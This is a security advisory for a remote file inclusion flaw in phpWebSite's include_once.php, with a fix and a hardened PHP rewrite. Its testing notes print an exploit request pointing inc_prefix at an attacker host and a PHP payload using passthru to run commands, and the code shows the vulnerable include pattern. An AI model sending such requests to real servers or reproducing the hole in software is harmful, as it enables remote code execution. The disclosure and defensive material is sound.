phpWebSite modsecurity.php Remote File Include

2002-09-22T00:00:00
ID OSVDB:3848
Type osvdb
Reporter OSVDB
Modified 2002-09-22T00:00:00

Description

Vulnerability Description

phpWebSite contains a flaw that allows a remote attacker to include arbitrary PHP files. Because the include_once.php script performs no sanity checks on the inc_prefix variable, an attacker can set it to a URL and have the script include files from a remote site. A specially crafted PHP file hosted there will be fetched and executed on the victim machine with the privileges of the web server.

Solution Description

Upgrade to version 0.8.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

Request (MYBOX is a web server the attacker controls):

  http://[victim]/catalog/includes/include_once.php?inc_prefix=http://MYBOX/

include_once.php builds its include path from inc_prefix, so the request above makes it fetch http://MYBOX/htmlheader.php. The attacker serves that file with the following contents, and the command runs on the victim as the web server user:

  --- htmlheader.php ---
  <? passthru("/bin/ls") ?>
  ----------------------
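The shape of the flaw described in the Vulnerability Description and exercised by the request above, next to a hardened replacement. This is an added example, not phpWebSite's own code: the function names, the allowlist entries and the directory layout are assumed for illustration, and the real include_once.php is not reproduced here.

```php
<?php
// Added example (not phpWebSite's own code): the shape of the include flaw
// described in the advisory, next to a hardened replacement. Function names,
// allowlist entries and directory layout are assumed for illustration.

// VULNERABLE: the prefix is taken straight from the request and concatenated
// into the include path. With allow_url_fopen enabled (the PHP 4 default), a
// request carrying ?inc_prefix=http://MYBOX/ makes PHP fetch and execute
// http://MYBOX/htmlheader.php as the web server user.
function vulnerable_include(array $get): void
{
    $inc_prefix = isset($get['inc_prefix']) ? $get['inc_prefix'] : './';
    include_once $inc_prefix . 'htmlheader.php';
}

// Rejects any prefix that names a URL scheme (http:, ftp:, php:, data:, ...),
// an absolute path, or a parent-directory step. Defence in depth only: the
// hardened function below never puts request data into the path at all.
function prefix_is_unsafe(string $prefix): bool
{
    return preg_match('#^[a-z][a-z0-9+.\-]*:#i', $prefix) === 1
        || strpos($prefix, '..') !== false
        || (isset($prefix[0]) && ($prefix[0] === '/' || $prefix[0] === '\\'));
}

// HARDENED: the request only selects a key from a fixed allowlist, the final
// path is canonicalised with realpath(), and it must resolve inside $app_root.
// Returns the path that was included so a caller can verify it.
function safe_include(array $get, string $app_root): string
{
    $allowed = [
        'core'  => 'includes/',        // assumed layout
        'theme' => 'themes/default/',  // assumed layout
    ];
    $key = isset($get['inc']) ? (string) $get['inc'] : 'core';
    if (!array_key_exists($key, $allowed) || prefix_is_unsafe($allowed[$key])) {
        throw new InvalidArgumentException('unknown include set: ' . $key);
    }

    $root = realpath($app_root);
    $path = ($root === false)
        ? false
        : realpath($root . '/' . $allowed[$key] . 'htmlheader.php');
    $rootPrefix = ($root === false) ? '' : rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($path === false || $rootPrefix === '' || strpos($path, $rootPrefix) !== 0) {
        throw new RuntimeException('include target missing or outside application root');
    }
    include_once $path;
    return $path;
}

// Demonstration with the advisory's own payload: the attacker-supplied prefix
// is rejected by the check, and safe_include() never consults it anyway.
var_dump(prefix_is_unsafe('http://MYBOX/'));
var_dump(prefix_is_unsafe('../../etc/'));
var_dump(prefix_is_unsafe('includes/'));
```

Two caveats for anyone applying this pattern: allow_url_fopen, and on PHP 5.2 and later allow_url_include, are PHP_INI_SYSTEM settings and must be turned off in php.ini rather than with ini_set(); and disabling them only blocks the http:// vector shown in the advisory, not local file inclusion through ../ traversal, which is why the allowlist plus realpath() containment is the actual fix rather than the regex filter alone.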

References:

Vendor URL: http://phpwebsite.appstate.edu/
Secunia Advisory ID: 7145
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0275.html
ISS X-Force ID: 10164
CVE: CVE-2002-1135
Bugtraq ID: 5779